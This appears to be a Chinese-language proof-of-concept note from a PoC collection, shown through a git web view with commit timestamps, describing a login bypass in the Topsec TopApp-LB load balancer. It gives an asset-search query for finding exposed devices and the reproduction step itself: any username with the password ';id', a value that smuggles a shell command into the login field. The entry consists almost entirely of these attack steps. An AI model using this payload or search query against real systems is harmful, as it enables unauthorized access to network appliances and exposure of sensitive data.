Awesome-POC/Web应用漏洞/天融信 TopApp-LB系统 任意登陆.md

33 lines
446 B
Markdown
Raw Normal View History

2022-05-17 17:43:20 +08:00
# 天融信 TopApp-LB系统 任意登陆
## 漏洞描述
天融信负载均衡TopApp-LB系统无需密码可直接登陆查看敏感信息
2022-12-06 17:17:54 +08:00
## 漏洞影响
2022-05-17 17:43:20 +08:00
```
天融信负载均衡TopApp-LB
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2022-05-17 17:43:20 +08:00
```
app="天融信-TopApp-LB-负载均衡系统"
```
## 漏洞复现
在登录页面中输入,账号:**任意账号** 密码:**;id**
2022-12-05 11:09:28 +08:00
![](./images/202202091919361.png)
2022-05-17 17:43:20 +08:00
成功登录
2022-12-05 11:09:28 +08:00
![](./images/202202091919022.png)